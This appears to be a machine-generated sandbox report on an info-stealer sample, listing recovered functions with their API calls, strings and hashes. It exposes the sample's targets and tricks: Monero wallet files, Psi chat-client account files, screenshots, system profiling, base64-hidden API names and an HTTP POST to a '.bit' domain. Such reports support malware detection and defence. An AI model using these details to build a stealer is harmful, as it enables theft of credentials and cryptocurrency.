crtdll.dll, xrefs: 00417B2E
Gdiplus.dll, xrefs: 00417B48, 00417B62, 00417B7C, 00417B96, 00417BB0, 00417BCA, 00417BE4
GdipGetImageEncodersSize, xrefs: 00417B91
CreateStreamOnHGlobal, xrefs: 00417BF9
ole32.dll, xrefs: 00417BFE, 00417C18
GdipGetImageEncoders, xrefs: 00417BAB
GdipDisposeImage, xrefs: 00417BC5
GdiplusStartup, xrefs: 00417B43
GdiplusShutdown, xrefs: 00417B5D

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: 57a083585dbc8ce9df7a63cc0a821fb4195fa2904eec68678409c4ef2343df9d
Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
Opcode Fuzzy Hash: 57a083585dbc8ce9df7a63cc0a821fb4195fa2904eec68678409c4ef2343df9d
Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD

Function 00418688 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 375
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
InternetReadFile.WININET(00000000,?,00010064,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A9D
InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4

Strings

.bit, xrefs: 00418928
wininet.dll, xrefs: 00418701
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041897F
Host: , xrefs: 00418951
POST, xrefs: 004186DD

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressProc$Internet$HandleLibraryLoad$CloseConnectCrackFileHttpModuleOpenReadRequestSend
String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
API String ID: 946835797-2879170074
Opcode ID: 56a08f971a344ee113826defbb1e72536bdb7fe50e4f450330abf4f2e38adec9
Instruction ID: 76fb72323b8ae20ff65678eff3f65f90e6b3cd7dcd45201054b3a4b47af70050
Opcode Fuzzy Hash: 56a08f971a344ee113826defbb1e72536bdb7fe50e4f450330abf4f2e38adec9
Instruction Fuzzy Hash: 8AE1EAB1910219ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B6681DB78AA458B58

Function 00416B94 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 225
libraryloaderprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC), ref: 00416C90
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00416CAF
Process32NextW.KERNEL32(00000000,?), ref: 00416D1E
CloseHandle.KERNEL32(00000000), ref: 00416D2C
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

kernel32.dll, xrefs: 00416BFF, 00416C2D
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9
a2VybmVsMzIuZGxs, xrefs: 00416C61

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 1927487376-4127804628
Opcode ID: 9a370d218ba479bacba9924df52720c8bc51f1f8e8ad6289ec54fa435578b534
Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
Opcode Fuzzy Hash: 9a370d218ba479bacba9924df52720c8bc51f1f8e8ad6289ec54fa435578b534
Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00415610 Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 457
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,?), ref: 00415871
FindClose.KERNEL32(?), ref: 00415886

Part of subcall function 00403BBC: SysReAllocStringLen.OLEAUT32(?,?,?), ref: 00403BD2

Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE

FindFirstFileW.KERNEL32(00000000,?,0041A69E), ref: 00415750

Part of subcall function 0040DDB0: CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
Part of subcall function 0040DDB0: DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A

Strings

.keys, xrefs: 004159B6, 004159E9
\Monero\, xrefs: 004158EA, 00415935, 0041599D
Software\, xrefs: 00415AEB
%APPDATA%\, xrefs: 00415644
\autoscan\, xrefs: 004157BD
strDataDir, xrefs: 00415AFB
.address.txt, xrefs: 0041594E, 00415981

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$Find$AllocAttributesCloseCopyDeleteFirstNextQueryStringValue
String ID: %APPDATA%\$.address.txt$.keys$Software\$\Monero\$\autoscan\$strDataDir
API String ID: 2772453214-362373116
Opcode ID: 16568faf391a59140c197a04871ca19803f38377cf84135bb1feaade3a903878
Instruction ID: 4a2bc140344c74034c961c230d6d7cd75b0d6f61e5a75df0b3530fd0fd3fd8f7
Opcode Fuzzy Hash: 16568faf391a59140c197a04871ca19803f38377cf84135bb1feaade3a903878
Instruction Fuzzy Hash: A4120D34A001199BDB11EB55CC85BDDB779EF84308F5081FAE508B7292DB38AF858F99

Function 00414408 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

0_@, xrefs: 00414BBB, 00414BD1
CA, xrefs: 004144DA, 00414580, 00414A89, 00414BEC
._., xrefs: 0041485D
.LNK, xrefs: 00414788
LLA, xrefs: 00414C04

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeString$FileFindFirst
String ID: .LNK$._.$0_@$LLA$CA
API String ID: 1653790112-882170572
Opcode ID: 8430bddf3a1df6261560ddb6dc0424d77e6c689ca10f39fdf3dcf66a768186a7
Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
Opcode Fuzzy Hash: 8430bddf3a1df6261560ddb6dc0424d77e6c689ca10f39fdf3dcf66a768186a7
Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59

Function 00416748 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Count: , xrefs: 004167EF
GetRAM: , xrefs: 00416833
CPU Model: , xrefs: 0041677E
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: bc92bcc3e197d973a3a694272e71556a0c5c4ca862a3d57ec3daae12d6facc84
Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
Opcode Fuzzy Hash: bc92bcc3e197d973a3a694272e71556a0c5c4ca862a3d57ec3daae12d6facc84
Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58

Function 004087DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(6CA50000,00000000,00408961,?,0041B0FC,0000044D,?,00419DB6), ref: 00408827
FindFirstFileW.KERNEL32(00000000,?,6CA50000,00000000,00408961,?,0041B0FC,0000044D,?,00419DB6), ref: 00408856
DeleteFileW.KERNEL32(00000000,?,00408994,?,0041B0FC,0000044D,?,00419DB6), ref: 004088EB
FindNextFileW.KERNELBASE(00000000,?,?,0041B0FC,0000044D,?,00419DB6), ref: 004088F6
SetCurrentDirectoryW.KERNEL32(00000000,?,0041B0FC,0000044D,?,00419DB6), ref: 0040892D
RemoveDirectoryW.KERNEL32(00000000,?,0041B0FC,0000044D,?,00419DB6), ref: 00408941

Strings

%TEMP%\, xrefs: 00408910

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$DirectoryFind$CurrentDeleteFirstFreeLibraryNextRemove
String ID: %TEMP%\
API String ID: 24694787-2282305525
Opcode ID: bf673f0aa18eb5449fb802a6f650f5c3dc5f1121d0befde26993cc387fee6983
Instruction ID: 7ce94d71dddb1cf777d35a768eca412b7855db8bc738da5367f8e470d0430529
Opcode Fuzzy Hash: bf673f0aa18eb5449fb802a6f650f5c3dc5f1121d0befde26993cc387fee6983
Instruction Fuzzy Hash: 04410F706006199FC750EF69CC85A9AB7F9EF89305F4045BAE448F32A1DB38AE448F59

Function 0040B15C Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 588210b06e7466f33f668d0a8c5683e72e1db78c57bf2da9f1a5b49b6d1e0292
Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
Opcode Fuzzy Hash: 588210b06e7466f33f668d0a8c5683e72e1db78c57bf2da9f1a5b49b6d1e0292
Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8

Function 0040D0A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 176fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0040D1C8

Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE

Part of subcall function 00407168: GetFileAttributesW.KERNEL32(00000000,00000000,00000000,00407293,?,?), ref: 004071B4
Part of subcall function 00407168: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,?,?), ref: 004071CA
Part of subcall function 00407168: GetFileAttributesW.KERNEL32(00000000,00000000,?,?), ref: 004071DF
Part of subcall function 00407168: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,?,?), ref: 004071F5
Part of subcall function 00407168: ReadFile.KERNEL32(000000FF,004147A5,?,LLA,00000000,00000000,00407263,?,?,?), ref: 00407246
Part of subcall function 00407168: CloseHandle.KERNEL32(000000FF,0040726A), ref: 00407260

Strings

Psi, xrefs: 0040D16F
\*.*, xrefs: 0040D1AB
PsiPlus, xrefs: 0040D15F
\accounts.xml, xrefs: 0040D1F7, 0040D259

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$Attributes$Create$CloseFindFirstHandleRead
String ID: Psi$PsiPlus$\*.*$\accounts.xml
API String ID: 23041140-482826270
Opcode ID: 3c4efc3fac8a0243b94c88f16e1b7c5cbae3ecbea876001e5abfc6cf06faed9e
Instruction ID: 115fcd51e622de82cac4d0b8ead8c2dc7a32b2b6ab385f81ee772f80c7f6c347
Opcode Fuzzy Hash: 3c4efc3fac8a0243b94c88f16e1b7c5cbae3ecbea876001e5abfc6cf06faed9e
Instruction Fuzzy Hash: 91711D74A001199FDB10EB95CC85B9DB7B9EF45308F5081FAE808B7291DB38AF498F55

Function 00408D3C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 339fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0041A69E), ref: 00408DD0
GetFileAttributesW.KERNEL32(00000000,?,00409204,?,0041A69E,?,?,?,?,?,?,0041A69E), ref: 00408E32
FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,0041A69E), ref: 004090F8

Strings

\*.*, xrefs: 00408DB0

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesFirstNext
String ID: \*.*
API String ID: 2194085478-1173974218
Opcode ID: 7c2d9d634b4927bbe86dd2d784de5aeeaa99b4bb87293a077af95bce882314e1
Instruction ID: 0d373cd88fde81d46e67ec363a4cd78273a777710110dde0edb0dabeac45b8c6
Opcode Fuzzy Hash: 7c2d9d634b4927bbe86dd2d784de5aeeaa99b4bb87293a077af95bce882314e1
Instruction Fuzzy Hash: 4AD12970A00209AFDB10EF95D885ADEB7F9EF49304F1041BAE504F72A1DB39AE45CB59

Function 00408D44 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 337fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0041A69E), ref: 00408DD0
GetFileAttributesW.KERNEL32(00000000,?,00409204,?,0041A69E,?,?,?,?,?,?,0041A69E), ref: 00408E32
FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,0041A69E), ref: 004090F8

Strings

\*.*, xrefs: 00408DB0

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesFirstNext
String ID: \*.*
API String ID: 2194085478-1173974218
Opcode ID: 1b67583be09de6412031d5871d699c3e612fc2c0ab19a09dba079c97bcff8a3f
Instruction ID: bd495df848275e9c4f425f21efe3e4f71b0b4aa0b50b6ea973a153adf56fcae6
Opcode Fuzzy Hash: 1b67583be09de6412031d5871d699c3e612fc2c0ab19a09dba079c97bcff8a3f
Instruction Fuzzy Hash: 18D12970A00209AFDB10EF95C885ADEB7F9EF49304F1041BAE504F72A1DB39AE45CB59

Function 0040D06E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0040D1C8

Strings

Psi, xrefs: 0040D16F
\*.*, xrefs: 0040D1AB
PsiPlus, xrefs: 0040D15F

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: Psi$PsiPlus$\*.*
API String ID: 1974802433-2194304473
Opcode ID: 703d8b5242a08a8db683f3bae43f8bcf3c26f45f187b9fc55ceefde9b9784aa7
Instruction ID: 8d20dbab4f76fd7704b8bbb6049f9e1dbc895236e47937b98e464379e76ce1b4
Opcode Fuzzy Hash: 703d8b5242a08a8db683f3bae43f8bcf3c26f45f187b9fc55ceefde9b9784aa7
Instruction Fuzzy Hash: CC5181709041499FDB11EBA5CC41B9DBBB9EF45308F5041FBE808F7292DB38AE4A8B55

Function 0040989F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

FindFirstFileW.KERNEL32(00000000,?,00000000,00409A7E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000), ref: 0040993E

Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE

FindNextFileW.KERNEL32(00000000,?,?,00409AA0,?,00409AA0,0041A69E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E), ref: 00409A3F
FindClose.KERNEL32(00000000,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000,?,0040D819,00000000,0040D863), ref: 00409A51

Part of subcall function 004095A4: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676

Strings

\*.*, xrefs: 0040991E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$Find$String$AllocAttributesCloseCopyFirstFreeNext
String ID: \*.*
API String ID: 388414203-1173974218
Opcode ID: fc4845d8a7467cfe967d80715bfce9b06f4326a75cfd1ac3618ec102a77ddc32
Instruction ID: 4b84d3bad575dbbbbc4ce0dccbd8eec4ecec2959b06ba8f769e72cfc9add7c19
Opcode Fuzzy Hash: fc4845d8a7467cfe967d80715bfce9b06f4326a75cfd1ac3618ec102a77ddc32
Instruction Fuzzy Hash: F7411E70A04259AFCB10EF65CC85A8DBBB9FF49304F5041FAA508B3292D7795F458F54

Function 004098A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

FindFirstFileW.KERNEL32(00000000,?,00000000,00409A7E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000), ref: 0040993E

Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE

FindNextFileW.KERNEL32(00000000,?,?,00409AA0,?,00409AA0,0041A69E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E), ref: 00409A3F
FindClose.KERNEL32(00000000,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000,?,0040D819,00000000,0040D863), ref: 00409A51

Part of subcall function 004095A4: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676

Strings

\*.*, xrefs: 0040991E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$Find$String$AllocAttributesCloseCopyFirstFreeNext
String ID: \*.*
API String ID: 388414203-1173974218
Opcode ID: e2196b03a9d087d50b6047ea20b559e90859e5d60900ea0ffc21caf91373946a
Instruction ID: 08d55710f553101df7130532bbf42046b2496fa9cfe4254e8507854638314a45
Opcode Fuzzy Hash: e2196b03a9d087d50b6047ea20b559e90859e5d60900ea0ffc21caf91373946a
Instruction Fuzzy Hash: 10410070A04219AFDB10EF65CC85A8EBBB9FF49304F5041FAA508B3292D7799F458F58

Function 00417098 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00417170,?,-00000001,0041B0FC,?,?,0041746F,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8), ref: 004170D6

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

UTC+, xrefs: 00417105

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeInformationStringTimeZone
String ID: UTC+
API String ID: 3683333525-3251258214
Opcode ID: 6be58dea3c23a17224194cf5b30d3e4445856ad682ea28c4caa18300847e192c
Instruction ID: 5a93f027c48b31af31c8153c62edde409b9a7000c026b3128d58eaab427eec80
Opcode Fuzzy Hash: 6be58dea3c23a17224194cf5b30d3e4445856ad682ea28c4caa18300847e192c
Instruction Fuzzy Hash: A1113D747047145FD755DB1ACC41B96B6FAEB8D300F1181BAB90CE3391DB389E448A59

Function 00416FB8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000059,?,00000100,?,-00000001,0041B0FC,?,?,00417429,Layouts: ,?,00417604,?,00000001,00417654), ref: 00417015

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: dcc4219dc7e13377bd319a26e064fbabf75e9c6a3bab1ee70f7a42fa93842446
Instruction ID: ed97a03f88aff6160dae607c36df162438e6b287a6cdd3858f72ec1f850147c0
Opcode Fuzzy Hash: dcc4219dc7e13377bd319a26e064fbabf75e9c6a3bab1ee70f7a42fa93842446
Instruction Fuzzy Hash: 1911B1315002189FDB11DB55CC41BDABBF9EB8D710F0040B6E908E7290E6349E80CFA4

Function 0040A4A4 Relevance: 1.5, APIs: 1, Instructions: 16comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000,?,00000000,0040A52D,0041A69E), ref: 0040A4BC

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction ID: ecfa08d63a5e99a02bf1f10941cb6c6ba3816feefb3116676bc77a3be9f2b9a2
Opcode Fuzzy Hash: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction Fuzzy Hash: E5C002953917243AE551B2AA2CCAF5B418C4B88B59F214177B618F61D2A5E85C2001AE

